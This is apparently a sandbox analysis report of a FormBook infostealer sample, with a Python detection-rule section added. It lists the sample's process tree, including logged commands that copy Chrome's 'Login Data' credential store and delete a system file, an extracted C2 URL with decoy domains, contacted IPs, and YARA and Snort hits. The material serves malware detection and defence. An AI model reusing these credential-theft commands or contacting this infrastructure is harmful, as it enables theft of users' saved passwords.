
Windows Analysis Report
TR0627729920002.exe

Overview

General Information

Sample Name: TR0627729920002.exe
Analysis ID: 680563
MD5: 8dbfe68662123710d83fef939287d9a3
SHA1: 9481ef5498dd490e4efe83601f916ee48f61e649
SHA256: 663b7bc66499e507ca1f8fad6e42195a54fe242db3cc71bf4762952fe04ce5ee
Tags: exe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Multi AV Scanner detection for submitted file
Yara detected FormBook
Benign windows process drops PE files
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Snort IDS alert for network traffic
Yara detected UAC Bypass using ComputerDefaults
Sample uses process hollowing technique
Tries to steal Mail credentials (via file / registry access)
Maps a DLL or memory area into another process
Creates multiple autostart registry keys
Writes to foreign memory regions
Machine Learning detection for sample
Allocates memory in foreign processes
Performs DNS queries to domains with low reputation
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
Drops or copies cmd.exe with a different name (likely to bypass HIPS)
C2 URLs / IPs found in malware configuration
Creates a thread in another existing process (thread injection)
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Enables debug privileges
Creates a DirectInput object (often for capturing keystrokes)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Dropped file seen in connection with other malware
Found large amount of non-executed APIs
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

  • System is w10x64
  • TR0627729920002.exe (PID: 5932 cmdline: "C:\Users\user\Desktop\TR0627729920002.exe" MD5: 8DBFE68662123710D83FEF939287D9A3)
    • cmd.exe (PID: 564 cmdline: "C:\Windows\System32\cmd.exe" /k MD5: F3BDBE3BB6F734E357235F4D5898582D)
      • conhost.exe (PID: 5216 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • explorer.exe (PID: 3968 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • Jwjxmakrv.exe (PID: 2460 cmdline: "C:\Users\Public\Libraries\Jwjxmakrv.exe" MD5: 8DBFE68662123710D83FEF939287D9A3)
          • cmd.exe (PID: 2136 cmdline: "C:\Windows\System32\cmd.exe" /k MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5896 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • Jwjxmakrv.exe (PID: 5912 cmdline: "C:\Users\Public\Libraries\Jwjxmakrv.exe" MD5: 8DBFE68662123710D83FEF939287D9A3)
          • cmd.exe (PID: 3464 cmdline: "C:\Windows\System32\cmd.exe" /k MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5256 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • rundll32.exe (PID: 4684 cmdline: C:\Windows\SysWOW64\rundll32.exe MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
          • cmd.exe (PID: 3060 cmdline: /c del "C:\Windows\SysWOW64\cmd.exe" MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 3436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
          • cmd.exe (PID: 5440 cmdline: /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 5036 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
        • IconCachet0hh.exe (PID: 5220 cmdline: C:\Program Files (x86)\P1bxx\IconCachet0hh.exe MD5: F3BDBE3BB6F734E357235F4D5898582D)
          • conhost.exe (PID: 4968 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup
Extracted malware configuration (FormBook): {"C2 list": ["www.nutricognition.com/uj3c/"], "decoy": ["copimetro.com", "choonchain.com", "luxxwireless.com", "fashionweekofcincinnati.com", "campingshare.net", "suncochina.com", "kidsfundoor.com", "testingnyc.co", "lovesoe.com", "vehiclesbeenrecord.com", "socialpearmarketing.com", "maxproductdji.com", "getallarticle.online", "forummind.com", "arenamarenostrum.com", "trisuaka.xyz", "designgamagazine.com", "chateaulehotel.com", "huangse5.com", "esginvestment.tech", "intercontinentalship.com", "moneytaoism.com", "agardenfortwo.com", "trendiddas.com", "fjuoomw.xyz", "dantvilla.com", "shopwithtrooperdavecom.com", "lanwenzong.com", "xpertsrealty.com", "gamelabsmash.com", "nomaxdic.com", "chillyracing.com", "mypleasure-blog.com", "projectkyla.com", "florurbana.com", "oneplacemexico.com", "gografic.com", "giantht.com", "dotombori-base.com", "westlifinance.online", "maacsecurity.com", "lydas.info", "instapandas.com", "labustiadepaper.net", "unglue52.com", "onurnet.net", "wellkept.info", "6111.site", "platinumroofingsusa.com", "bodyplex.fitness", "empireapothecary.com", "meigsbuilds.online", "garygrover.com", "nicholasnikas.com", "yd9992.com", "protections-clients.info", "sueyhzx.com", "naturathome.info", "superinformatico.net", "printsgarden.com", "xn--qn1b03fy2b841b.com", "preferable.info", "ozzyconstructionma.com", "10stopp.online"]}
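The process tree above is the part of this report a detection engineer can act on without the sandbox: the sample hollows a `cmd.exe /k` child, the payload reaches explorer.exe, explorer.exe launches an argument-less SysWOW64 rundll32.exe, and that rundll32.exe runs cmd.exe to copy Chrome's "Login Data" store and to delete a file under C:\Windows, while a renamed copy of cmd.exe (same MD5 as the real one) runs from C:\Program Files (x86)\P1bxx\IconCachet0hh.exe and two copies of the sample run from C:\Users\Public\Libraries. The rules below are an added example (not Joe Sandbox code) that turn those observations into checks over process-creation records. PROCS is a constructed copy of the report's tree; the image paths of the two "/c ..." children of rundll32.exe are an assumption, because the report prints only their arguments and the cmd.exe hash. KNOWN_SYSTEM_HASHES holds the hashes this report shows for the sandbox's own system binaries; in production, feed it your gold-image hashes.

```python
"""Process-tree triage for the FormBook injection / persistence chain.

Added example, not Joe Sandbox code. PROCS is a constructed copy of the
report's process tree (PIDs, command lines and MD5s as reported). The image
paths of PIDs 3060 and 5440 are assumed to be SysWOW64\\cmd.exe: the report
shows only their arguments and the cmd.exe hash.
"""
import ntpath
import re
from dataclasses import dataclass

SAMPLE_MD5 = "8dbfe68662123710d83fef939287d9a3"

# Hashes the report shows for this sandbox's system binaries (assumption: your
# own gold-image hash set goes here in production).
KNOWN_SYSTEM_HASHES = {
    "f3bdbe3bb6f734e357235f4d5898582d": "cmd.exe",
    "d7ca562b0db4f4dd0f03a89a1fdad63d": "rundll32.exe",
    "ad5296b280e8f522a8a897c96bab0e1d": "explorer.exe",
    "ea777deea782e8b4d7c7c33bbf8a4496": "conhost.exe",
}


@dataclass(frozen=True)
class Proc:
    pid: int
    ppid: int
    image: str
    cmdline: str
    md5: str


CMD_MD5 = "f3bdbe3bb6f734e357235f4d5898582d"
PROCS = [  # constructed from the report's process tree
    Proc(5932, 0, r"C:\Users\user\Desktop\TR0627729920002.exe", r'"C:\Users\user\Desktop\TR0627729920002.exe"', SAMPLE_MD5),
    Proc(564, 5932, r"C:\Windows\System32\cmd.exe", r'"C:\Windows\System32\cmd.exe" /k', CMD_MD5),
    Proc(3968, 564, r"C:\Windows\explorer.exe", r"C:\Windows\Explorer.EXE", "ad5296b280e8f522a8a897c96bab0e1d"),
    Proc(2460, 3968, r"C:\Users\Public\Libraries\Jwjxmakrv.exe", r'"C:\Users\Public\Libraries\Jwjxmakrv.exe"', SAMPLE_MD5),
    Proc(5912, 3968, r"C:\Users\Public\Libraries\Jwjxmakrv.exe", r'"C:\Users\Public\Libraries\Jwjxmakrv.exe"', SAMPLE_MD5),
    Proc(4684, 3968, r"C:\Windows\SysWOW64\rundll32.exe", r"C:\Windows\SysWOW64\rundll32.exe", "d7ca562b0db4f4dd0f03a89a1fdad63d"),
    # image path assumed (see module docstring)
    Proc(3060, 4684, r"C:\Windows\SysWOW64\cmd.exe", r'/c del "C:\Windows\SysWOW64\cmd.exe"', CMD_MD5),
    Proc(5440, 4684, r"C:\Windows\SysWOW64\cmd.exe",
         r'/c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V', CMD_MD5),
    Proc(5220, 3968, r"C:\Program Files (x86)\P1bxx\IconCachet0hh.exe", r"C:\Program Files (x86)\P1bxx\IconCachet0hh.exe", CMD_MD5),
]


def _basename(path):
    return ntpath.basename(path).lower()


def rule_renamed_system_binary(p):
    """Hash of a known system binary running under a different file name (HIPS bypass)."""
    name = KNOWN_SYSTEM_HASHES.get(p.md5.lower())
    if name and _basename(p.image) != name:
        return f"hash of {name} running as {_basename(p.image)} from {ntpath.dirname(p.image)}"


def rule_argless_rundll32(p):
    """rundll32.exe with no DLL argument has nothing legitimate to do: classic injection host."""
    if _basename(p.image) == "rundll32.exe" and p.cmdline.strip().lower().endswith("rundll32.exe"):
        return "rundll32.exe started without a DLL argument"


def rule_browser_credential_copy(p):
    """cmd.exe copying a Chromium 'Login Data' SQLite store (the report's /c copy ... /V)."""
    if _basename(p.image) == "cmd.exe" and re.search(r"\bcopy\b.*\\login data\b", p.cmdline, re.I):
        return "cmd.exe copies a Chromium Login Data credential store"


def rule_system_binary_deleted(p):
    if _basename(p.image) == "cmd.exe" and re.search(r"\bdel\b.*\\windows\\", p.cmdline, re.I):
        return "cmd.exe deletes a file under C:\\Windows"


def rule_sample_copy_in_public_libraries(p):
    """The submitted sample re-executing from the world-writable Public\\Libraries folder."""
    if ntpath.dirname(p.image).lower() == r"c:\users\public\libraries" and p.md5.lower() == SAMPLE_MD5:
        return "copy of the submitted sample executing from C:\\Users\\Public\\Libraries"


RULES = [rule_renamed_system_binary, rule_argless_rundll32, rule_browser_credential_copy,
         rule_system_binary_deleted, rule_sample_copy_in_public_libraries]


def triage(procs=PROCS):
    """Return (rule_name, pid, detail) for every rule that fires on every process."""
    findings = []
    for p in procs:
        for rule in RULES:
            detail = rule(p)
            if detail:
                findings.append((rule.__name__, p.pid, detail))
    return findings


def ancestry(pid, procs=PROCS):
    """Parent chain for a PID, e.g. 5440 -> rundll32 -> explorer -> cmd /k -> sample."""
    by_pid = {p.pid: p for p in procs}
    chain = []
    while pid in by_pid:
        chain.append(pid)
        pid = by_pid[pid].ppid
    return chain


if __name__ == "__main__":
    for name, pid, detail in triage():
        print(f"{name:38} pid={pid:<5} {detail}  chain={ancestry(pid)}")
```

Note what the tree alone cannot show: the hollowed `cmd.exe /k` (PID 564) and the injected explorer.exe (PID 3968) look clean to these rules, because their image, hash and command line are all legitimate. Catching them needs the memory-side telemetry the report's signatures describe (foreign memory writes, thread-context changes, APC queuing, a system process making network connections), which is why the Networking indicators below matter as much as the process tree.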
Source | Rule | Description | Author
C:\Users\Public\Libraries\vrkamxjwJ.url | Methodology_Shortcut_HotKey | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x59:$hotkey: \x0AHotKey=7
  • 0x0:$url_explicit: [InternetShortcut]
C:\Users\Public\Libraries\vrkamxjwJ.url | Methodology_Contains_Shortcut_OtherURIhandlers | Detects possible shortcut usage for .URL persistence | @itsreallynick (Nick Carr)
  • 0x14:$file: URL=
  • 0x0:$url_explicit: [InternetShortcut]
Source | Rule | Description | Author
00000008.00000002.326814708.0000000002868000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingComputerDefaults | Yara detected UAC Bypass using ComputerDefaults | Joe Security
00000000.00000002.276683470.0000000002718000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_UACBypassusingComputerDefaults | Yara detected UAC Bypass using ComputerDefaults | Joe Security
00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x6581:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1cd30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x9def:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x16547:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8c08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8fa2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x16345:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x15df1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x16447:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x165bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x99ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1506c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa732:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1b997:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ca9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
  ($sequence_0 contains 0F 31, the rdtsc instruction: this is the timing check behind the "Tries to detect virtualization through RDTSC time measurements" signature. Note that all FormBook rule hits are on memory dumps and unpacked regions of the hollowed cmd.exe at 0x50410000, not on the packed sample on disk.)
(66 entries in total; remaining entries not shown)
Source | Rule | Description | Author
5.0.cmd.exe.50410000.0.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
5.0.cmd.exe.50410000.0.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
  • 0x5781:$a1: 3C 30 50 4F 53 54 74 09 40
  • 0x1bf30:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
  • 0x8fef:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
  • 0x15747:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
5.0.cmd.exe.50410000.0.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x7e08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x81a2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x15545:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14ff1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x15647:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x157bf:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x8bba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1426c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9932:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab97:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bc9a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
5.0.cmd.exe.50410000.0.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x17a19:$sqlite3step: 68 34 1C 7B E1
  • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
  • 0x17a48:$sqlite3text: 68 38 2A 90 C5
  • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
  • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
  (Each JPCERT string is a `push imm32` (opcode 68) of the constant the payload uses to locate sqlite3_step, sqlite3_column_text and sqlite3_column_blob at run time; these are the calls it needs to read the browser credential databases it copies, see the "Login Data" copy in the process tree.)
5.0.cmd.exe.50410000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
(37 entries in total; remaining entries not shown)
No Sigma rule has matched

Snort IDS alerts (15). All alerts are TCP to destination port 80 with classtype "A Network Trojan was detected"; SIDs 2031412, 2031449 and 2031453 are the ET TROJAN FormBook CnC Checkin (GET) rules (see Networking). Every check-in connection trips all three rules, so the five distinct source ports below are five connections, not fifteen.

Timestamp                 Source              Destination          SID
08/08/22-20:14:24.056805  192.168.2.3:49839   34.102.136.180:80    2031449
08/08/22-20:14:24.056805  192.168.2.3:49839   34.102.136.180:80    2031453
08/08/22-20:14:24.056805  192.168.2.3:49839   34.102.136.180:80    2031412
08/08/22-20:14:29.416650  192.168.2.3:49849   198.54.117.218:80    2031453
08/08/22-20:14:29.416650  192.168.2.3:49849   198.54.117.218:80    2031449
08/08/22-20:14:29.416650  192.168.2.3:49849   198.54.117.218:80    2031412
08/08/22-20:14:34.726453  192.168.2.3:49850   2.57.90.16:80        2031449
08/08/22-20:14:34.726453  192.168.2.3:49850   2.57.90.16:80        2031453
08/08/22-20:14:34.726453  192.168.2.3:49850   2.57.90.16:80        2031412
08/08/22-20:15:40.535789  192.168.2.3:49861   38.54.163.57:80      2031449
08/08/22-20:15:40.535789  192.168.2.3:49861   38.54.163.57:80      2031412
08/08/22-20:15:40.535789  192.168.2.3:49861   38.54.163.57:80      2031453
08/08/22-20:16:21.818812  192.168.2.3:49863   15.197.142.173:80    2031453
08/08/22-20:16:21.818812  192.168.2.3:49863   15.197.142.173:80    2031412
08/08/22-20:16:21.818812  192.168.2.3:49863   15.197.142.173:80    2031449


            AV Detection

Source: TR0627729920002.exe | ReversingLabs: Detection: 29%
Source: Yara match | File source: 5.0.cmd.exe.50410000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.cmd.exe.50410000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.cmd.exe.50410000.4.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.cmd.exe.50410000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.cmd.exe.50410000.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.cmd.exe.50410000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.2.cmd.exe.50410000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.cmd.exe.50410000.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.cmd.exe.50410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 5.0.cmd.exe.50410000.3.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.768343844.0000000000D50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.278080538.0000000003CE0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.366747947.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.328666768.000000000366B000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.407639397.00000000036E0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000002.407600284.00000000036B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000008.00000002.329116862.0000000003C00000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.273665319.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.274126698.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.275130208.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.773383896.0000000001020000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000007.00000000.393025016.000000000D346000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000005.00000000.274615202.0000000050410000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000001D.00000002.766540425.0000000000940000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: http://www.trisuaka.xyz/uj3c/ | Avira URL Cloud: Label: malware
Source: http://www.nomaxdic.com/uj3c/ | Avira URL Cloud: Label: malware
Source: www.nutricognition.com/uj3c/ | Avira URL Cloud: Label: malware
Source: kidsfundoor.com | Virustotal: Detection: 7%
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe | ReversingLabs: Detection: 29%
Source: TR0627729920002.exe | Joe Sandbox ML: detected
Source: C:\Users\Public\Libraries\Jwjxmakrv.exe | Joe Sandbox ML: detected
Source: 5.2.cmd.exe.50410000.4.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.cmd.exe.50410000.0.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.cmd.exe.50410000.1.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 0.2.TR0627729920002.exe.2162de8.1.unpack | Avira: Label: TR/Patched.Ren.Gen
Source: 5.0.cmd.exe.50410000.2.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 5.0.cmd.exe.50410000.3.unpack | Avira: Label: TR/Crypt.ZPACK.Gen
Source: 00000005.00000002.411833760.0000000050410000.00000040.00000400.00020000.00000000.sdmp | Malware Configuration Extractor: FormBook {"C2 list": ["www.nutricognition.com/uj3c/"], "decoy": ["copimetro.com", "choonchain.com", "luxxwireless.com", "fashionweekofcincinnati.com", "campingshare.net", "suncochina.com", "kidsfundoor.com", "testingnyc.co", "lovesoe.com", "vehiclesbeenrecord.com", "socialpearmarketing.com", "maxproductdji.com", "getallarticle.online", "forummind.com", "arenamarenostrum.com", "trisuaka.xyz", "designgamagazine.com", "chateaulehotel.com", "huangse5.com", "esginvestment.tech", "intercontinentalship.com", "moneytaoism.com", "agardenfortwo.com", "trendiddas.com", "fjuoomw.xyz", "dantvilla.com", "shopwithtrooperdavecom.com", "lanwenzong.com", "xpertsrealty.com", "gamelabsmash.com", "nomaxdic.com", "chillyracing.com", "mypleasure-blog.com", "projectkyla.com", "florurbana.com", "oneplacemexico.com", "gografic.com", "giantht.com", "dotombori-base.com", "westlifinance.online", "maacsecurity.com", "lydas.info", "instapandas.com", "labustiadepaper.net", "unglue52.com", "onurnet.net", "wellkept.info", "6111.site", "platinumroofingsusa.com", "bodyplex.fitness", "empireapothecary.com", "meigsbuilds.online", "garygrover.com", "nicholasnikas.com", "yd9992.com", "protections-clients.info", "sueyhzx.com", "naturathome.info", "superinformatico.net", "printsgarden.com", "xn--qn1b03fy2b841b.com", "preferable.info", "ozzyconstructionma.com", "10stopp.online"]}

            Exploits

(The Yara matches in this section are the "Yara detected UAC Bypass using ComputerDefaults" signature; the two .sdmp sources ending in 2868000 and 2718000 are the JoeSecurity_UACBypassusingComputerDefaults rows of the memory-dump table above.)
Source: Yara match | File source: 0.2.TR0627729920002.exe.2162de8.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.TR0627729920002.exe.2162de8.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000008.00000002.326814708.0000000002868000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.276683470.0000000002718000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.352406046.0000000000828000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.276153005.0000000002162000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: TR0627729920002.exe PID: 5932, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Jwjxmakrv.exe PID: 2460, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: Jwjxmakrv.exe PID: 5912, type: MEMORYSTR
Source: TR0627729920002.exe | Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
Source: unknown | HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49728 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.43.12:443 -> 192.168.2.3:49746 version: TLS 1.2
Source: unknown | HTTPS traffic detected: 13.107.43.13:443 -> 192.168.2.3:49749 version: TLS 1.2
            Source: Binary string: wntdll.pdbUGP source: cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: cmd.pdbUGP source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr
            Source: Binary string: wntdll.pdb source: cmd.exe, cmd.exe, 00000005.00000002.410186369.0000000003CCF000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000002.408623347.0000000003BB0000.00000040.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.277914032.0000000003A12000.00000004.00000800.00020000.00000000.sdmp, cmd.exe, 00000005.00000003.275403519.0000000003874000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.777435424.0000000004B0F000.00000040.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.409178249.0000000004859000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000003.407505205.00000000046BD000.00000004.00000800.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.774652570.00000000049F0000.00000040.00000800.00020000.00000000.sdmp
            Source: Binary string: rundll32.pdb source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: rundll32.pdbGCTL source: cmd.exe, 00000005.00000002.408560787.0000000003B70000.00000040.10000000.00040000.00000000.sdmp
            Source: Binary string: cmd.pdb source: rundll32.exe, 0000001D.00000002.770717003.0000000000DA4000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 0000001D.00000002.779445654.0000000004F27000.00000004.10000000.00040000.00000000.sdmp, IconCachet0hh.exe.7.dr

            Networking

Source: C:\Windows\explorer.exe | Domain query: www.gografic.com
Source: C:\Windows\explorer.exe | Network Connect: 154.55.180.56 80
Source: C:\Windows\explorer.exe | Domain query: www.moneytaoism.com
Source: C:\Windows\explorer.exe | Domain query: www.naturathome.info
Source: C:\Windows\explorer.exe | Domain query: www.6111.site
Source: C:\Windows\explorer.exe | Network Connect: 5.183.8.187 80
Source: C:\Windows\explorer.exe | Network Connect: 38.54.163.57 80
Source: C:\Windows\explorer.exe | Domain query: www.kidsfundoor.com
Source: C:\Windows\explorer.exe | Domain query: www.choonchain.com
Source: C:\Windows\explorer.exe | Domain query: www.empireapothecary.com
Source: C:\Windows\explorer.exe | Domain query: www.huangse5.com
Source: C:\Windows\explorer.exe | Domain query: www.nutricognition.com
Source: C:\Windows\explorer.exe | Network Connect: 209.17.116.163 80
Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.218 80
Source: C:\Windows\explorer.exe | Network Connect: 81.169.145.158 80
Source: C:\Windows\explorer.exe | Domain query: www.trisuaka.xyz
Source: C:\Windows\explorer.exe | Domain query: www.trendiddas.com
Source: C:\Windows\explorer.exe | Domain query: www.nomaxdic.com
